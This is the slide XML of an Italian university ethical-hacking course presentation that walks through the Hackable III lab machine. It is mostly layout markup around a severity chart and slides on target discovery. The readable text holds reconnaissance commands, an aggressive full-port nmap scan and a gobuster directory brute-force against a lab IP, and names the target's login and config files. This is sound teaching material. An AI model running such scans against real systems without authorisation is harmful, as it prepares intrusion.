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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258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1" r:id="rId12"/>
    <p:sldId id="312" r:id="rId13"/>
    <p:sldId id="314" r:id="rId14"/>
    <p:sldId id="313" r:id="rId15"/>
    <p:sldId id="315" r:id="rId16"/>
    <p:sldId id="317" r:id="rId17"/>
    <p:sldId id="318" r:id="rId18"/>
    <p:sldId id="319" r:id="rId19"/>
    <p:sldId id="320" r:id="rId20"/>
    <p:sldId id="321" r:id="rId21"/>
    <p:sldId id="322" r:id="rId22"/>
    <p:sldId id="325" r:id="rId23"/>
    <p:sldId id="324" r:id="rId24"/>
    <p:sldId id="326" r:id="rId25"/>
    <p:sldId id="327" r:id="rId26"/>
    <p:sldId id="328" r:id="rId27"/>
    <p:sldId id="329" r:id="rId28"/>
    <p:sldId id="330" r:id="rId29"/>
    <p:sldId id="333" r:id="rId30"/>
    <p:sldId id="331" r:id="rId31"/>
    <p:sldId id="334" r:id="rId32"/>
    <p:sldId id="335" r:id="rId33"/>
    <p:sldId id="336" r:id="rId34"/>
    <p:sldId id="337" r:id="rId35"/>
    <p:sldId id="339" r:id="rId36"/>
    <p:sldId id="340" r:id="rId37"/>
    <p:sldId id="341" r:id="rId38"/>
    <p:sldId id="342" r:id="rId39"/>
    <p:sldId id="259" r:id="rId40"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Bahiana" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Barlow" panose="00000500000000000000" pitchFamily="2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Squada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A9BBA0-9607-42CB-889A-039D8271C701}">
  <a:tblStyle styleId="{FCA9BBA0-9607-42CB-889A-039D8271C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486510576609363"/>
          <c:y val="0.12439675813434992"/>
          <c:w val="0.48056453430292584"/>
          <c:h val="0.63303931107696498"/>
        </c:manualLayout>
      </c:layout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Vulnerabilità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9B-44AA-B436-29B14A6446A1}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1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9B-44AA-B436-29B14A6446A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9B-44AA-B436-29B14A6446A1}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="3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9B-44AA-B436-29B14A6446A1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9B-44AA-B436-29B14A6446A1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91C39FD-EA48-4CEC-AF4C-C406DBF8D0D0}" type="CATEGORYNAM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endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                      <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr>
                      <a:defRPr>
                        <a:solidFill>
                          <a:schemeClr val="accent2"/>
                        </a:solidFill>
                      </a:defRPr>
                    </a:pPr>
                    <a:fld id="{5E94EA3E-BD71-404F-A425-8E9109C47469}" type="VALU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9B-44AA-B436-29B14A6446A1}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="1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4D899A7-2A63-46A7-BA76-0BBBEF3230A5}" type="CATEGORYNAM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4"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:t>[NOME CATEGORIA]</a:t>
                    </a:fld>
                    <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                      <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr>
                      <a:defRPr spc="0">
                        <a:solidFill>
                          <a:schemeClr val="accent4"/>
                        </a:solidFill>
                      </a:defRPr>
                    </a:pPr>
                    <a:fld id="{8616888D-3810-4131-BA18-62B7913F3BA5}" type="VALU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4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9B-44AA-B436-29B14A6446A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spc="0" baseline="0">
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                      <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0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819B-44AA-B436-29B14A6446A1}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="3"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-8.1232549494255679E-2"/>
                  <c:y val="5.6395310838190642E-3"/>
                </c:manualLayout>
              </c:layout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79EF784-60DF-4141-978D-CD53009964F6}" type="CATEGORYNAM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4"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:t>[NOME CATEGORIA]</a:t>
                    </a:fld>
                    <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                      <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr>
                      <a:defRPr spc="0">
                        <a:solidFill>
                          <a:schemeClr val="accent4"/>
                        </a:solidFill>
                      </a:defRPr>
                    </a:pPr>
                    <a:fld id="{9505ACA8-C841-4D7F-A6C3-60FFBCB0078C}" type="VALU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4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19B-44AA-B436-29B14A6446A1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77EEAF7-EA9A-4BD8-8F10-3F21D74E27C4}" type="CATEGORYNAM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2"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:t>[NOME CATEGORIA]</a:t>
                    </a:fld>
                    <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                      <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr>
                      <a:defRPr spc="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2"/>
                        </a:solidFill>
                      </a:defRPr>
                    </a:pPr>
                    <a:fld id="{598B6D89-0223-4C30-8D18-ECA62CFDB4B0}" type="VALUE">
                      <a:rPr lang="en-US" sz="1200" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2"/>
                        </a:solidFill>
                        <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:rPr>
                      <a:pPr>
                        <a:defRPr spc="0">
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                        </a:defRPr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19B-44AA-B436-29B14A6446A1}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="2EE6C4"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="6E3DCF"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:sp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Foglio1!$A$2:$A$6</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>Critico</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Alto</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Medio</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Basso</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Info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7</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2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19B-44AA-B436-29B14A6446A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7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71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33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723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1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570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99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34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65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175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0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400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954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1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3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31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838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701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20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67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3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318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55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5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49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613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535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69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16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87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1019570e5_0_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1019570e5_0_1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533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62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7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960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10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58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6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rot="10800000" flipH="1">
            <a:off x="-12" y="3476400"/>
            <a:ext cx="781075" cy="995825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31243" h="39833" extrusionOk="0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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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5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6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avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="31243" h="39833" extrusionOk="0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subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2249474" y="380974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Università degli Studi di Salerno</a:t>
            </a:r>
            <a:endParaRPr i="1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1891123" y="1964303"/>
            <a:ext cx="53616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Hackable III</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;463;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB4CBCB-A608-F96D-04EF-42F1CB7FF364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1421748" y="1166758"/>
            <a:ext cx="6300350" cy="7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Squada One"/>
              <a:buNone/>
              <a:defRPr sz="72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it-IT" sz="2800" dirty="0">
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Etchical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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F831F2C7-12F6-788D-49C0-1F7AB472A4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4" y="0"/>
            <a:ext cx="1078810" cy="1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62;p30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27AFBDBA-3ADE-4BF3-EAF9-15114578C734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3642831" y="4378305"/>
            <a:ext cx="18581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i="1" dirty="0"/>
              <a:t>A.A. 2021-2022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5615F77-E727-0AB5-96E8-4F77F26BE1F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1421748" y="3024203"/>
            <a:ext cx="2396393" cy="982853"/>
            <a:chOff x="1421748" y="2944074"/>
            <a:chExt cx="2396393" cy="982853"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Google Shape;463;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DFF436B-CDDF-3585-3790-9B63AB9A1E3F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1421748" y="2944074"/>
              <a:ext cx="1217604" cy="688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Squada One"/>
                <a:buNone/>
                <a:defRPr sz="72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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                  <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Docente</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;463;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D2EF05-F1C7-95A5-D9CB-590377242BD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1421748" y="3238476"/>
              <a:ext cx="2396393" cy="688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Squada One"/>
                <a:buNone/>
                <a:defRPr sz="72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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" dirty="0">
                  <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Arcangelo Castiglione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C3E017F-5BC6-DB41-1E3F-A3BD30A7CEF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6129909" y="2987142"/>
            <a:ext cx="2543748" cy="1238507"/>
            <a:chOff x="6018332" y="2915410"/>
            <a:chExt cx="2489874" cy="1238507"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Google Shape;463;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5106D97D-6BA5-A8C3-6DE9-43525F083381}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6018332" y="2915410"/>
              <a:ext cx="1217604" cy="688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Squada One"/>
                <a:buNone/>
                <a:defRPr sz="72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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                  <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Studente</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;463;p30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD585D91-9FAC-B224-C903-FCFC89B88DDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6018332" y="3271993"/>
              <a:ext cx="2489874" cy="88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Squada One"/>
                <a:buNone/>
                <a:defRPr sz="72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Bahiana"/>
                <a:buNone/>
                <a:defRPr sz="6000" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Bahiana"/>
                  <a:ea typeface="Bahiana"/>
                  <a:cs typeface="Bahiana"/>
                  <a:sym typeface="Bahiana"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" dirty="0">
                  <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Federica Ungherese</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" dirty="0">
                  <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>0522500942</a:t>
              </a:r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D78E1721-E69A-FDDF-8835-83995A26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526" y="4083600"/>
            <a:ext cx="1059900" cy="1059900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Enumerating target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Attivo – OS Detection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nmap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-A -p- -T5 -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oX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aggressive_scan.xml 10.0.2.13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2210EA81-BE9E-3CF4-B3B6-62EA937E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95" y="1536605"/>
            <a:ext cx="4356735" cy="21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Homepage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Kryptos – LAN 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1F289C-69DA-81FA-205A-04B1A4D58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3" b="7050"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2094022" y="1059899"/>
            <a:ext cx="4955955" cy="2368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3C97842-34D9-CF30-A291-E50619CCA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24" b="18105"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219800" y="3686174"/>
            <a:ext cx="6765650" cy="628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77F82EF-2D0B-189B-928F-EC11251425D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039179" y="3859193"/>
            <a:ext cx="968339" cy="14845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D7436522-A6A0-A00B-4928-D9061056A3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32633" y="4314825"/>
            <a:ext cx="1278732" cy="659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>
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:endParaRPr sz="14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Login page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Kryptos – LAN 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334953E-7644-1E2B-C694-35F66AB24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" t="835" r="962"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4979391" y="939601"/>
            <a:ext cx="3744596" cy="35629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4C38E8A-048D-025B-6089-EE08F3EBA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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="420013" y="2066205"/>
            <a:ext cx="4480600" cy="1011089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F5E3DFC-7AC6-167E-4109-8A121C2E4803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4064794" y="2928843"/>
            <a:ext cx="835819" cy="14845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Google Shape;504;p34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E43D9FD-FBB7-BB8E-87ED-ACDFF1DCC7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20947" y="3136107"/>
            <a:ext cx="1278732" cy="659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>
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>login.html</a:t>
            </a:r>
            <a:endParaRPr sz="14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Login script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Kryptos – LAN </a:t>
            </a:r>
            <a:endParaRPr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9C13A7-421C-AC5A-281C-3B664ADF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0" y="1074733"/>
            <a:ext cx="4111199" cy="299402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E6FA95D-4D97-B577-3237-B7DF669A2EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377150" y="1378649"/>
            <a:ext cx="1278731" cy="150113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6514D7C-6D98-ABFA-42F1-90B73654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800" y="1074733"/>
            <a:ext cx="4083050" cy="2994025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;504;p34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CFA1B6-B731-0425-42F3-638915B561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93383" y="4135367"/>
            <a:ext cx="1278732" cy="659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 err="1">
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>login.php</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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B9DC648F-3C43-4572-3E31-A679221A2702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6085959" y="4135366"/>
            <a:ext cx="1278732" cy="65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sz="1400" dirty="0" err="1">
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>config.php</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="14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Login script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Kryptos – LAN </a:t>
            </a:r>
            <a:endParaRPr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9C13A7-421C-AC5A-281C-3B664ADF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0" y="1040130"/>
            <a:ext cx="4206240" cy="306324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E6FA95D-4D97-B577-3237-B7DF669A2EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="2900268"/>
            <a:ext cx="1278731" cy="150113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05CFE2-C715-F2D5-47FF-E2AE18AB9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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5234940" y="1040129"/>
            <a:ext cx="3342067" cy="3063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Google Shape;504;p34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA05781D-7ED9-0B76-E947-E4FB94F576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3804" y="4114921"/>
            <a:ext cx="1278732" cy="659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 err="1">
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>login.php</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;504;p34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F2E969-18DB-ACF5-B6FD-58A6272A9177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6266607" y="4114921"/>
            <a:ext cx="1278732" cy="65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sz="1400" dirty="0">
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>3.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40197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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAPPING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038" name="Picture 14" descr="apache-logo-4 - PNG - Download de Logotipos">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DBB682C-190A-95EB-75BB-7628F217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45" y="1427456"/>
            <a:ext cx="1614487" cy="6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nux Logo PNG File | PNG All">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B99367E-E1EC-BAE1-115B-7A0AC7F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52" y="2571750"/>
            <a:ext cx="128044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manuale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658B1CE-9207-E23F-E2D7-59054C008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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720050" y="1183967"/>
            <a:ext cx="3777141" cy="2255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DE4A4B-C4DA-C7A9-51F9-DA64F408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42"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4943475" y="1183967"/>
            <a:ext cx="3619978" cy="2430770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 14" descr="apache-logo-4 - PNG - Download de Logotipos">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5708FB7E-85EA-9658-C3B0-D64CE14D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47" y="4112200"/>
            <a:ext cx="1614487" cy="6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1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manuale</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 16" descr="Linux Logo PNG File | PNG All">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA6CCE0-E810-9EC6-F82D-8341C83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25" y="4064794"/>
            <a:ext cx="628750" cy="7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BEFFA46-A956-E6FA-6F25-C349C5231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50" y="1233211"/>
            <a:ext cx="2924482" cy="26770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BE482F-5A99-C2AC-365A-5D372B06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09" y="1233210"/>
            <a:ext cx="3796391" cy="26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gobuster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75892" y="2079142"/>
              <a:ext cx="2089815" cy="118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gobuster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dir –u 10.0.2.13 –w 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usr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/share/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wordlists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dirb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/common.txt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7653E5-B656-F2BF-AE51-3B2B9E47D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21" b="11720"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4160518" y="1248649"/>
            <a:ext cx="4467260" cy="1424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71518CC-D2BA-AD3B-38BB-A8CE4068D07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4160517" y="1626328"/>
            <a:ext cx="1981201" cy="905627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885F73-9D52-3714-50FB-8C7D2BFC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50" y="2909634"/>
            <a:ext cx="4091940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gobuster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75892" y="2079142"/>
              <a:ext cx="2089815" cy="118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gobuster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dir –u 10.0.2.13 –w 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usr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/share/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wordlists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dirb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/common.txt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D7810D5D-769D-12D0-EAF0-38B44458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" t="877" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4477392" y="1086547"/>
            <a:ext cx="3855482" cy="30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0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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320500" y="478650"/>
            <a:ext cx="4503000" cy="418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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464200" y="470414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INTRODUZIONE</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3822335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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464200" y="102162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>
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>TARGET DISCOVERY</a:t>
            </a:r>
            <a:endParaRPr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Google Shape;490;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320500" y="1542997"/>
